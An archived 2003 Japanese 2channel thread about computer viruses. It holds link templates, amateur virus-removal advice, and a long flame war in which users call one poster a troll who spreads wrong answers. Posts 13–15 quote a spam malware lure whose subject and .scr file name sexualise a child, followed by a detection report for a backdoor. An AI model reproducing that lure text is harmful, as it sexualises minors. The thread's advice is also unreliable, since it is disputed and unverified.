2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ウィルス情報&質問 総合スレッド☆Part15

1 :薮パソユーザー ◆0fQkHdNop2 :03/11/08 23:16
ウィルスに関わる話題・質問はこちらに
ウィルスかどうかはウィルススキャンして判断してください。
この板ではURLの鑑定は行っていません。
URLを貼り付けて「このURL大丈夫ですか?」といった質問は
避けてください。鑑定の依頼はラウンジhttp://ex.2ch.net/entrance/の鑑定スレでお願いします。
上記のURLが新スレに移行した場合ラウンジで「勇気」「鑑定」
などのキーワードで検索してください。

IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response
http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報
http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報
http://www.nai.com/japan/security/
オンラインウイルス検索
http://housecall.antivirus.com/housecall/start_jp.asp

[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50
セキュリティ初心者質問スレッドのテンプレも参照。

同じ質問を複数の板やスレッドに書き込むマルチポストは嫌われます。
どの板でも回答をもらえなくなってしまうので、書き込んでせめて1日程度はお待ちください。
お急ぎなら検索が早いかも? → http://www.google.co.jp/


2 :名無しさん@お腹いっぱい。:03/11/08 23:18
・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50

・[Ctrrl]か{コマンド}と{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください
2chスレッド検索http://www.ruitomo.com/~gulab/k.html

・ノートンを使用して誤反応かな と思う人はこちら
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50

シマンテックセキュリティチェック(オンラインウィルススキャンができる)
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp


3 :薮パソユーザー ◆0fQkHdNop2 :03/11/08 23:18
前スレ950さんへ、

>STOPが付いてあるファイル名は
>「documents and settings \..\Local Settings\Temp\mciB.tmp」
>検査結果=未知フォーマット:CAB


tmpファイルなら削除しても多分大丈夫だと思います。
コピーをFDかCD−Rにバックアップとって削除してください。

4 :薮パソユーザー ◆0fQkHdNop2 :03/11/08 23:19
後は誰かに聞いてください。

5 :名無しさん@お腹いっぱい。:03/11/08 23:19
粘着コテハン荒らし薮パソユーザーにご注意下さい。

1 なんにでもアンチドートを勧める(危険度・低)
2 ネットランナー今年の1月号の受け売り(危険度・中、アフォ度・高)
3 ピント外れ意味なしor大きなお世話or大恥カキコ(危険度・中、アフォ度・高)
4 大嘘を教える(危険度・高)
5 大嘘を指摘されると逆ギレして指摘者を誹謗(迷惑度・高)

また住人を煽るスレを立ててスレストを喰らったことも。
初心者および最近セキュ板に来た皆さんは十分注意してください。

6 :名無しさん@お腹いっぱい。:03/11/08 23:22
エロサイト見たら・・・助けてください!Part13
http://pc2.2ch.net/test/read.cgi/pcqa/1057575418/l50
スパイウェア削除ソフトSpybot 5
http://pc.2ch.net/test/read.cgi/sec/1057338156/l50
スパイウェア発見専用ソフト「Ad-aware」Part7
http://pc.2ch.net/test/read.cgi/sec/1058423961/l50
猫箱(ウイルスとかスパイウェアとかトロイとかのくだ質寄せ集め)
ttp://members.tripod.co.jp/nekohako/virusfac.html


7 :名無しさん@お腹いっぱい。:03/11/08 23:22
現在セキュ板には薮パソユーザーと名乗る荒らしが粘着しています。
この荒らしの特徴は、乏しい知識で知らないことにでたらめを回答します。
そして、そのでたらめを糊塗するために更なるでたらめを展開します。

この荒らしの回答は一見もっともらしく見えますが、安易に信用してはいけません。
たまに正しい解答を行いますが、薮パソユーザーのスキルは非常に低いので
正しく答えられる質問はgoogleで検索すれば容易に見つかるものに限られます。
質問者の方はご注意ください。


8 :名無しさん@お腹いっぱい。:03/11/08 23:23
ウイルス検索
検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。

Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版(日本語版と微妙に内容が異なる事がある)
http://www.symantec.com/avcenter/vinfodb.html

TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/

McAFEEウイルス情報
http://vil.mcafee.com/default.asp?


9 :名無しさん@お腹いっぱい。:03/11/08 23:53
>>1は都昆布

10 :名無しさん@お腹いっぱい。:03/11/09 00:02
>>1は薮

11 :名無しさん@お腹いっぱい。:03/11/09 00:03
薮スレか…これは荒れそうだなw

12 :名無しさん@お腹いっぱい。:03/11/09 00:08
トリップをNGName入りさせてあるから、それほど問題ない。>藪

13 :Backdoor.Litmus.203:03/11/09 00:09
X-Trace-PostClient-IP: 68.146.81.8
From: qrjfhb@grtssrgt.com
Newsgroups: japan.binaries.pictures.erotica,japan.binaries.pictures.erotica.lolita,japan.binaries.pictures.erotica.loose-socks,japan.binaries.pictures.erotica.shota
Subject: My Youngest Daughter Nude! 579
Lines: 1037
Message-ID: < ZN1rb.341517$9l5.310162@pd7tw2no >
Date: Sat, 08 Nov 2003 08:27:37 GMT
NNTP-Posting-Host: 24.71.223.147
X-Complaints-To: abuse@shaw.ca
X-Trace: pd7tw2no 1068280057 24.71.223.147 (Sat, 08 Nov 2003 01:27:37 MST)

14 :Backdoor.Litmus.203:03/11/09 00:10
NNTP-Posting-Date: Sat, 08 Nov 2003 01:27:37 MST
Organization: Shaw Residential Internet
Path: shaw.ca!pd7tw2no.POSTED!53ab2750!not-for-mail
Xref:

Attached picture below download today!
Attached picture below download today!

ovwfjerqoctdjiizjtypkmssuxpobjepiphbuwm

begin 644 C:\Program Files\mIRC\download\SoDamYoungAtMost13.scr

15 :Backdoor.Litmus.203:03/11/09 00:11
ファイルを分析しました。
送られたそれぞれのファイルについて
わかったことを以下に報告します。
ファイル名:C__Program Files_mIRC_download_SoDamYoungAtMost13.scr
このファイルは次のウィルスに感染しています:
Backdoor.Litmus.203 デベロッパーノート
\C__Program Files_mIRC_download_SoDamYoungAtMost13.scr is non-repairable threat.
NAV with the latest beta definition detects this. Please delete this file and replace it if neccessary.
Please follow the instruction at the end of this email message to install the latest beta definitions.
シマンテック・セキュリティ・レスポンス

16 :名無しさん@お腹いっぱい。:03/11/09 00:11
前スレに貼られていたテンプレ案

ウィルスに関わる話題・質問はこちら。

・ウィルス感染の疑い→まず、オンラインウイルス検索。
http://www.symantec.com/region/jp/securitycheck/index.html
http://www.trendmicro.co.jp/hcall/index.asp
(※署名済みActiveXコントロールのダウンロードを有効にすること)

・不審なURLの鑑定→ラウンジhttp://ex.2ch.net/entrance/ へ。
「勇気」「鑑定」 等のキーワードで鑑定スレを検索。

[関連リンク]
・IPAセキュリティセンター
http://www.ipa.go.jp/security/isg/virus.html
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/virusinfo/index.asp
・McAfee ウイルス情報
http://www.nai.com/japan/security/

・過去ログ、関連スレ等>>1-20あたり 補足>>1-50
・セキュリティ初心者質問スレッドのテンプレも参照。
▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
・ マルチポスト(複数の板・スレで同じことを質問)
・ 情報の小出し(始めにOSやソフト名等を必ず明示)
・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
・ 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。

17 :Backdoor.Litmus.203:03/11/09 00:17
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.litmus.203.html

18 :名無しさん@お腹いっぱい。:03/11/09 00:36
最近、PC立ち上げる都度 UPDATE というウインドウとエラーという小さいウインドウが開くようになりました。
加えて、10分ほどたつと、コピペや、印刷が出来なくなります。ウイルスバスター入れてますが、検索しても特にウイルスは出てきません。
何か対処法ありましたらよろしくお願いします。

19 :名無しさん@お腹いっぱい。:03/11/09 00:42
このスレは悪質なコテハンが自分のアピールのために立てた糞スレです。
全て>>1が回答するネタスレですのでご注意ください。

20 :名無しさん@お腹いっぱい。:03/11/09 01:05
↑荒らし

21 :名無しさん@お腹いっぱい。:03/11/09 01:09
↑藪

22 :名無しさん@お腹いっぱい。:03/11/09 01:38
こりゃあ、>>16をテンプレ案にして新スレを立て直した方がいいな。
このままでは質問スレとしてまともに機能しないので、
質問者が戸惑うだけだろう。

しかし、>>1が予想通りの行動を取ってくれるところが笑える。

23 :名無しさん@お腹いっぱい。:03/11/09 01:59
Part15、もう1回立て直したほうがいいよね。
これは、偽って事で。

24 :名無しさん@お腹いっぱい。:03/11/09 02:05
藪医者

25 :名無しさん@お腹いっぱい。:03/11/09 02:09
立てなおししたいところだけど、削除依頼出されたら多分これから
立てるスレがあぼーんされるんじゃ?
いっそココは薮の隔離スレにしたらどうだろう。
新しいスレはスレタイをなんか変えるとかして。

26 :名無しさん@お腹いっぱい。:03/11/09 02:25
セキュリティ初心者質問スレに誘導すればよい。

ちなみにスレを先に立てた者勝ちじゃないよ、次スレとして不適切であれば先に立てたスレでも削除はある。

27 :名無しさん@お腹いっぱい。:03/11/09 02:30
で、新しいスレがたちましたが、早くも藪らしきヤシが出現。

【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/2


28 :名無しさん@お腹いっぱい。:03/11/09 02:32
>>27
それ俺だわw

29 :名無しさん@お腹いっぱい。:03/11/09 02:35
何か他人と勘違いされたし...
おもしろいので寝る前にあげとこ

30 :薮パソユーザー:03/11/09 02:40
うんこー

31 :名無しさん@お腹いっぱい。:03/11/09 03:14
十十  ---  |     
米ケ   /  | /
女人 /\  |/

    うざい。 終了。

32 :名無しさん@お腹いっぱい。:03/11/09 03:23
こちらが↓本来のスレなのでご注意。
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

このスレは「薮パソユーザー ◆0fQkHdNop2」というコテハンが
たてたものです。

セキュ板質問スレの回答者は、「薮パソユーザー 」というコテハンに
非常に迷惑をこうむっています。

このコテハンは初心者では見分けにくいような間違い、質問に対して無意味、
無関係な知識の受け売り等を執拗にばら撒きます。放置しておけば、初心者や
セキュ板に最近きた人は「たくさん投稿しているコテハンだから権威なのだろう」と
誤解するに決まっています。おそらく本人もそれを狙って異常ともいえる多量の
投稿を繰り返しているものと思われます。

回答者は質問に回答するだけでも情報収集や検証に手間をかけているのに加えて
薮パソユーザーの「無意味、間違い投稿」にいちいち反論しなければなりません。
これは単純なアラシ行為にくらべてはるかに有害、迷惑で、セキュ板質問スレの
意義さえ危うくする行為といえます。

このスレで質問すると回答者は「薮パソユーザー」だけということになりかねません。
質問する方は十分注意してください。

33 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 12:12
このスレが本物の「ウィルス情報&質問 総合スレッド☆Part15 」スレです。

34 :名無しさん@お腹いっぱい。:03/11/09 12:26
必死だな、薮w

342 名前:"削除"依頼 投稿日:03/11/09 12:06 HOST:172.20.244.43.ap.livedoor.jp<8080><3128><8000><1080>
削除対象アドレス:
http://pc.2ch.net/test/read.cgi/sec/1068311899/

削除理由・詳細・その他:
重複スレッドですので削除願います。


時系列でまとめますと、

http://pc.2ch.net/test/read.cgi/sec/1064028518/l50
「ウィルス情報&質問 総合スレッド☆Part14」スレ終了 03/11/08 22:22
          ↓
http://pc.2ch.net/test/read.cgi/sec/1068300966/
「ウィルス情報&質問 総合スレッド☆Part15 」スレ設置 03/11/08 23:16
          ↓
http://pc.2ch.net/test/read.cgi/sec/1068311899/
「【正式】ウィルス情報&質問 総合スレッド☆Part15 」スレ設置 03/11/09 02:18

ですので、後で立てられた「【正式】ウィルス情報&質問
 総合スレッド☆Part15 」スレは混乱の原因になります
ので早急に削除願います。


35 :名無しさん@お腹いっぱい。:03/11/09 12:38
薮パソユーザーさんに質問。

どうして「TOKAIネットワーク」と契約しているのにLivedoorを使って書き込み
しているのですか?


207 名前:"削除"依頼 投稿日:03/09/09 20:06 HOST:izu0370.izubr2.thn.ne.jp<8080>
削除対象アドレス:
http://pc.2ch.net/test/read.cgi/sec/1063077555/109-116
http://pc.2ch.net/test/read.cgi/sec/1063077555/118-132
http://pc.2ch.net/test/read.cgi/sec/1063077555/133-134
http://pc.2ch.net/test/read.cgi/sec/1063077555/136-140
http://pc.2ch.net/test/read.cgi/sec/1063077555/142-157

削除理由・詳細・その他:
コテハン叩き投稿で、
荒らし目的投稿で、
板・スレに無関係な投稿で、
連続投稿ですので削除願います。

36 :名無しさん@お腹いっぱい。:03/11/09 12:54
つい先ごろdat落ちした「もの凄い勢いで誰かが質問に答えるスレ6172」と
いうスレが有った。
http://pc.2ch.net/test/read.cgi/sec/1060873079/

これはスレ立てが板違いの誤爆であり、そのスレの中で何度も何度も
「重複スレにつき質問は既にある質問系スレでどうぞ」と誘導レスが
入っていたにも関わらず薮パソユーザーはそれらを無視して
レスを書き込み続けた。質問自体も自演くさかったがな。

その薮がどの面さげて「重複スレッドですので削除願います」などと
言ってるのか?盗人猛々しいとはこの事だ。

37 :名無しさん@お腹いっぱい。:03/11/09 12:58
>>33
どっちかといえばここは
ウィルス『 薮パソユーザー ◆0fQkHdNop2 』情報&質問 総合スレッド☆Part15
じゃないか?

38 :名無しさん@お腹いっぱい。:03/11/09 13:15
質問させてください。
WORM_ANTINNY.Aに感染してしまいました

アンチウィルスソフトで
ファイルを見つけたのですが
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A
↑では、検出したファイルを全て削除してくださいとなっているのですが
動かなくなりそうで不安です。
ご教授くださいぺこ <(_ _)>
「〜.exe」も削除してしまっていいのでしょうか?


39 :糞パソユーザー:03/11/09 13:23
>>38
犯罪者は住所・氏名を警察に提出しなさい。

40 :名無しさん@お腹いっぱい。:03/11/09 13:34
>>36
ゴメン、それ俺だ

41 :名無しさん@お腹いっぱい。:03/11/09 13:35
>>38
それに懲りて
これからはファイル共有やめなはれ

42 :名無しさん@お腹いっぱい。:03/11/09 13:37
>>35
ゴメン、それも俺やw
何か人違いし過ぎ、お前ら

43 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 13:37
>>38


>ワームとして検出したファイルはすべて削除してください。
>単体で動作する一個の独立したプログラムであり、他のファイル
>への感染活動はありません。感染活動を行わない不正プログラム
>ですのでウイルスバスターなどウイルス対策製品の機能で「駆除」
>処理は行えません。


必要なファイルに感染してるのでなく単にコピーして増殖してる
だけなので「駆除」の対象でなく丸ごと「削除」するのが正解です。
心配なら「危険:WORM_ANTINNY.A」と書いたFDにバックアップ
でもとってから削除したらどうですか?

尚、システム復元機能のある場合には一旦復元機能を無効(復元
ポイントにワーム混入の危険があるから)にしてウィルスチェック
してから再度復元機能を有効にしてください。

44 :糞パソユーザー ◆jmnl8.f74Y :03/11/09 13:58
藪パソユーザー愛読中のny解説書、ネットランナー絶賛発売中!

45 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 13:59
>>43

↓はトレンドマイクロの説明の引用です。誤解なきよう。

>ワームとして検出したファイルはすべて削除してください。
>単体で動作する一個の独立したプログラムであり、他のファイル
>への感染活動はありません。感染活動を行わない不正プログラム
>ですのでウイルスバスターなどウイルス対策製品の機能で「駆除」
>処理は行えません。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A

46 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 14:01

このスレが本物の「ウィルス情報&質問 総合スレッド☆Part15 」スレです。


47 :糞パソユーザー ◆jmnl8.f74Y :03/11/09 14:06
nyの解説だけでなく、DVDのコピー方法まで解説するネットランナーを講読しよう。
藪パソユーザーお薦め、nyのクラックパッチもあるよ!

48 :名無しさん@お腹いっぱい。:03/11/09 14:07
22 名前:薮パソユーザー ◆0fQkHdNop2 投稿日:03/11/09 14:00

このスレはニセモノです。ここに質問を書き込まないでください。

本物のスレは↓です。

「ウィルス情報&質問 総合スレッド☆Part15」
http://pc.2ch.net/test/read.cgi/sec/1068300966/l50


さんざん重複スレで書き込みしていたお前が今回に限って
スレ誘導に必死なのはどうしてかね?

49 :名無しさん@お腹いっぱい。:03/11/09 14:08
必死にコテハンが誘導してます、削除人さんがまともな方ならこっちが削除対象だな。

50 :日本基地外ユーザー:03/11/09 14:12
アピール アピール コアマガジンに
載りたい 載りたい ガイドに載りたい
邪魔な猫は追い出した この板のコテは俺だけさ
アピールを阻む粘着達さ

51 :名無しさん@お腹いっぱい。:03/11/09 14:12
>>42
どの「俺」ですか?薮さん(w

52 :名無しさん@お腹いっぱい。:03/11/09 14:16
藪パソユーザー.TXTがVBS.ラブレターに感染してるってノートンが警告するんだけど。

53 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 15:09
>>35

はっきりとは覚えてませんが多分それは私の削除依頼でしょう。


54 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 15:42


このスレが本物の「ウィルス情報&質問 総合スレッド☆Part15 」スレです。



55 :名無しさん@お腹いっぱい。:03/11/09 16:01
( ´,_ゝ`)プッ

56 :名無しさん@お腹いっぱい。:03/11/09 17:08
最近別板で荒らしコテハンが同じような行動して、結局荒らしコテのスレがあぼーんされた。

57 :名無しさん@お腹いっぱい。:03/11/09 17:12
>>43
ありがとうございました
隔離はしていたのですが
気になっていたので
助かりましたぺこ <(_ _)>

58 :名無しさん@お腹いっぱい。:03/11/09 17:49
質問される方は、
ttp://www.geocities.co.jp/SiliconValley-Sunnyvale/3094/をご覧下さい。

59 :薮パソユーザー:03/11/09 17:55
>>58
氏ね

60 :名無しさん@お腹いっぱい。:03/11/09 20:09
>>58
( ´_ゝ`)フーン

61 :名無しさん@お腹いっぱい。:03/11/09 20:16
過去スレ (これ以前はパート7参照)
☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/sec/kako/1035/10354/1035401865.html
☆ウィルス情報&質問 総合スレッド☆part8
http://pc.2ch.net/test/read.cgi/sec/1039859073/
☆ウィルス情報&質問 総合スレッド☆part9
http://pc.2ch.net/test/read.cgi/sec/1045816526/
☆ウィルス情報&質問 総合スレッド☆part10
http://pc.2ch.net/test/read.cgi/sec/1051155882/

☆ウィルス情報&質問 総合スレッド☆Part14
http://pc.2ch.net/test/read.cgi/sec/1064028518/



62 :名無しさん@お腹いっぱい。:03/11/09 20:18
ウイルス検索
検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。

Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版(日本語版と微妙に内容が異なる事がある)
http://www.symantec.com/avcenter/vinfodb.html

TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/

McAFEEウイルス情報
http://vil.mcafee.com/default.asp?


63 :名無しさん@お腹いっぱい。:03/11/09 20:18
[ウィルス対策ソフト] 
【ノートン】インターネットセキュリティ Ver.25【2003】
http://pc.2ch.net/test/read.cgi/sec/1058254461/l50
ウイルスバスター2003Part11
http://pc.2ch.net/test/read.cgi/sec/1058107059/l50
がんばれマカフィーPART4
http://pc.2ch.net/test/read.cgi/sec/1057669813/l50
がんばれ!!ウイルス警備隊V3
http://pc.2ch.net/test/read.cgi/sec/1005442785/l50
Mac用ウイルス対策ソフト 
http://pc.2ch.net/test/read.cgi/sec/1007675941/l50

[ウィルス対策ソフト(無料)]
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50
★注意★フリーのAntiVir -9x 最新UPで不具合発生★
http://pc.2ch.net/test/read.cgi/sec/1000950998/l50
【フリー】AVG Anti-Virus Version8
http://pc.2ch.net/test/read.cgi/sec/1056081554/l50
アンチドートを語ろう♪
http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
最強のウィルス対策用ソフト
http://pc.2ch.net/test/read.cgi/sec/1000957607/l50


64 :名無しさん@お腹いっぱい。:03/11/09 20:20
「森で遊ぼう」
(ファイヤーウォールソフト・無料ウィルス用ソフト等セキュリティ関係解
説サイト
ダウンロードページのリンク 日本語解説ページあり)
ttp://eazyfox.tripod.co.jp/

・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ

ネスケ(ネットスケープコミュニケータ)やOperaを使用するという手段があることも
念頭にいれておいてください
http://home.netscape.com/ja/
http://www.jp.opera.com/


65 :名無しさん@お腹いっぱい。:03/11/09 20:21
新種のウィルスが流行したときは専用スレのリンクよろしくお願いします

「Nimda !! 」【その4】
http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)
http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
'code red'wormに続きw32/sircam
http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何?
http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
開いただけでウイルスに感染するページ
http://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez.E、Klez系スレッド part4
http://pc.2ch.net/test/read.cgi/sec/1030175440/l50
SQLExp(SQLP,Slammer,1434番ポート)スレッド 1
http://pc.2ch.net/test/read.cgi/sec/1043525470/l50
WEBPOPUPからメッセージをもらったひと
http://pc.2ch.net/test/read.cgi/sec/1035271935/l50
BugBearスレッド 1
http://pc.2ch.net/test/read.cgi/sec/1034373773/l50
【まだ】Blasterスレ Part2【終わっちゃいない】
http://pc.2ch.net/test/read.cgi/sec/1061002243/


66 :名無しさん@お腹いっぱい。:03/11/09 20:26
エロサイト見たら・・・助けてください!Part15
http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/
スパイウェア発見専用ソフト「Ad-aware」Part8
http://pc.2ch.net/test/read.cgi/sec/1064592787/l50
スパイウェア削除ソフトSpybot 7
http://pc.2ch.net/test/read.cgi/sec/1066451915/l50
猫箱(ウイルスとかスパイウェアとかトロイとかのくだ質寄せ集め)
ttp://members.tripod.co.jp/nekohako/virusfac.html


67 :名無しさん@お腹いっぱい。:03/11/09 20:27
ブラスターD関係 駆除方法、技術資料、オンラインスキャン、MSパッチなど

警察庁サイバーポリス公式解説
http://www.cyberpolice.go.jp/important/20030819_131641.html
警察庁技術対策課資料
http://www.cyberpolice.go.jp/server/virus/pdf/icmp_worm.pdf
情報処理振興事業協会公式解説
http://www.ipa.go.jp/security/topics/newvirus/img/Welchi-worm-WinXP-ver10.pdf

オンラインスキャン
トレンドマイクロ
http://www.trendmicro.co.jp/hcall/index.asp
サイゲート
http://scan.sygate.com/prequickscan.html
シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
マイクロソフトパッチ ms03-026(RPC)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-026.asp
マイクロソフトパッチ ms03-030(DirectX9.0a)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-030.asp

無料ファイアウォールソフト
アウトポスト free
http://www.agnitum.com/download/outpost1.html
ゾーンアラーム free
http://www.zonelabs.com/store/content/company/products/znalm/freeDownload.jsp?lid=zadb_zadown


68 :名無しさん@お腹いっぱい。:03/11/09 20:28
SWEN@MM(SWEN.A)スレ
http://pc.2ch.net/test/read.cgi/sec/1064010406/l50


☆ウィルス情報&質問 総合スレッド☆part13
http://pc.2ch.net/test/read.cgi/sec/1061454729/
☆ウィルス情報&質問 総合スレッド☆Part14
http://pc.2ch.net/test/read.cgi/sec/1064028518/


69 :名無しさん@お腹いっぱい。:03/11/09 20:28
ウィルス情報&質問 総合スレッド11
http://pc.2ch.net/test/read.cgi/sec/1056101401/
ウィルス情報&質問 総合スレッド12
http://pc.2ch.net/test/read.cgi/sec/1060186382/
ウィルス情報&質問 総合スレッド13
http://pc.2ch.net/test/read.cgi/sec/1061454729/


70 :名無しさん@お腹いっぱい。:03/11/09 20:29
>>61-68
テンプレ不足分追加

71 :名無しさん@お腹いっぱい。:03/11/09 20:41
削除依頼見てから書いたな。

72 :薮パソユーザー ◆yBEncckFOU :03/11/09 20:50
>>1に「過去ログ・関連スレ等>>1-20あたり 補足>>1-50 」と書かれているのに
レス数60過ぎてからテンプレ貼りかい?初めて来た人は判らないよねぇ。
今更貼っても遅い。誰が読むのwwwww

薮パソユーザー◆0fQkHdNop2よ、こういうのはテンプレって言わないんだよ。

73 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 20:50
ジョークウィルス


JOKE_MADO.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

HIKARU
http://www.vector.co.jp/soft/win95/amuse/se217070.html

ジョークウイルス+
http://www.vector.co.jp/soft/win95/amuse/se297894.html

マウスエスケープ
http://rd.vector.co.jp/soft/win95/amuse/se064923.html


その他ジョークソフト
http://rd.vector.co.jp/vpack/filearea/win95/amuse/joke/by_trend.html








74 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 20:52
>>72

どのみち読んで質問する者はほとんどいませんよ。

75 :名無しさん@お腹いっぱい。:03/11/09 20:54
なにこいつ

76 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 20:56
>>73をテンプレに追加しました。

77 : :03/11/09 20:57
>>74
そう思うならなんで必死に今頃テンプレ貼ってるんだよwwwwww
お前の正体が見えたな(いや、前から明らかだったが)

「どのみち読んで質問する者はほとんどいませんよ。 」

「ど の み ち 読 ん で 質 問 す る 者 は ほ と ん ど い ま せ ん よ。 」

78 :名無しさん@お腹いっぱい。:03/11/09 20:57
もう1つテンプレ

■■■■■■■■■■■■■重要■■■■■■■■■■■■■


質問される方は、
ttp://www.geocities.co.jp/SiliconValley-Sunnyvale/3094/
をよくお読みになってから質問してくださいね。



■■■■■■■■■■■■■重要■■■■■■■■■■■■■


79 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 20:58
回答者や次スレを立てる人が参考にできるように

80 :名無しさん@お腹いっぱい。:03/11/09 20:59
おまえ嫌われてるの気付かないの?

81 :名無しさん@お腹いっぱい。:03/11/09 21:01
>>78
うん、これは大事なテンプレだな。大変重要です。

82 :名無しさん@お腹いっぱい。:03/11/09 21:03
質問者の方へ
このスレはセキュ板に粘着しているでたらめを撒き散らす荒らしが立てたニセスレです。
回答者はこの荒らししかいません。
粘着荒らしに関して知りたい方はhttp://tmp2.2ch.net/test/read.cgi/tubo/1068207529/l50参照。

83 :名無しさん@お腹いっぱい。:03/11/09 21:12
>>74
過去スレを立てるものはテンプレをキチッと貼る所までを責任を持って
やってきていた(2ゲットみたいな割り込みを除いて)
だからこそスレ立てが終わると「おつかれ」などのねぎらいのレスがつく訳だ。

テンプレがなぜ大事なのかなど今更説明するまでもなかろう。
それをお前は>>74
> どのみち読んで質問する者はほとんどいませんよ。
とこうだ。

http://qb2.2ch.net/test/read.cgi/saku/1027430636/343
> またテンプレがしっかりとしていないため、次スレには不十分と判断しました。
> よろしくお願い致します。

削除依頼がでたら慌ててテンプレを貼る。質問者、他の回答者のことなど
考えず自己満足の為だけのスレ立てというのがはっきりしたな。

84 :名無しさん@お腹いっぱい。:03/11/09 21:15
どっちみち読まないと思ってるのなら、貼る必要はないよな。
削除依頼見て、慌てて付け足したんだろう。

85 :注意 ◆0fQkHdNop2 :03/11/09 21:43
>>61-73にテンプレの補足があります。

86 :質問者の方へ:03/11/09 22:00
このスレは>>1の自己満足の為だけに立てられました。
回答者は>>1しかいません。回答内容は自分でGoogleで検索すれば
わかる事か、または的外れで無駄な時間を費やす事になる内容ばかりです。

87 :名無しさん@お腹いっぱい。:03/11/09 22:01
■■■■■■■■■■■■■重要■■■■■■■■■■■■■


質問される方は、
ttp://www.geocities.co.jp/SiliconValley-Sunnyvale/3094/
をよくお読みになってから質問してくださいね。



■■■■■■■■■■■■■重要■■■■■■■■■■■■■

88 :名無しさん@お腹いっぱい。:03/11/09 22:26
このスレを立てたひとにスレの主旨などいろいろ質問があります。
まさか自分でスレを立てておいて削除依頼は出さないでしょうね?


89 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 22:47
>>88

何ですか?

90 :名無しさん@お腹いっぱい。:03/11/09 23:00
別に二本立てでいいじゃん。
必死に削除依頼してる香具師や、終了線引いてる香具師は
そこまでこの板に命掛けてんの?

91 :名無しさん@お腹いっぱい。:03/11/09 23:03
こういう厨房は閉鎖危機を知らないで言えるんだろうな、気楽でいいな。

92 :薮パソユーザー ◆0fQkHdNop2 :03/11/09 23:04
>>18

>最近、PC立ち上げる都度 UPDATE というウインドウとエラーという
>小さいウインドウが開くようになりました。
>加えて、10分ほどたつと、コピペや、印刷が出来なくなります。
>ウイルスバスター入れてますが、検索しても特にウイルスは出てきません。
>何か対処法ありましたらよろしくお願いします。


私にもわかりませんがスパイウェアのチェックをad-awareでしてください。
また、バスターを無効化するウィルスの可能性もありますのでアンチドート
でチェックしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504

93 :名無しさん@お腹いっぱい。:03/11/09 23:08
>>90にこのスレを任せよう。

アスペルガーコテハンと>>90で頑張ってくれ。

94 :名無しさん@お腹いっぱい。:03/11/09 23:12
>>92
私にもわかりませんが
私にもわかりませんが
私にもわかりませんが

95 :名無しさん@お腹いっぱい。:03/11/09 23:13
>>91
以前より情報価値の低くなったこの板なんて閉鎖してもあまり困らないような・・・

>>93
漏れはウィルスに感染したことないから無理
学校のネットワークならあるけど、当直SEに丸投げ

96 :名無しさん@お腹いっぱい。:03/11/09 23:22
あいつが居る限りこの板は糞

97 :名無しさん@お腹いっぱい。:03/11/09 23:23
ま、この板のレベルを下げた大きな原因はマルチポスト指摘され逆ギレした藪ほにゃららとかいうコテのせいだが。

98 :名無しさん@お腹いっぱい。:03/11/09 23:31
藪パソ、哀れだな(プゲラ
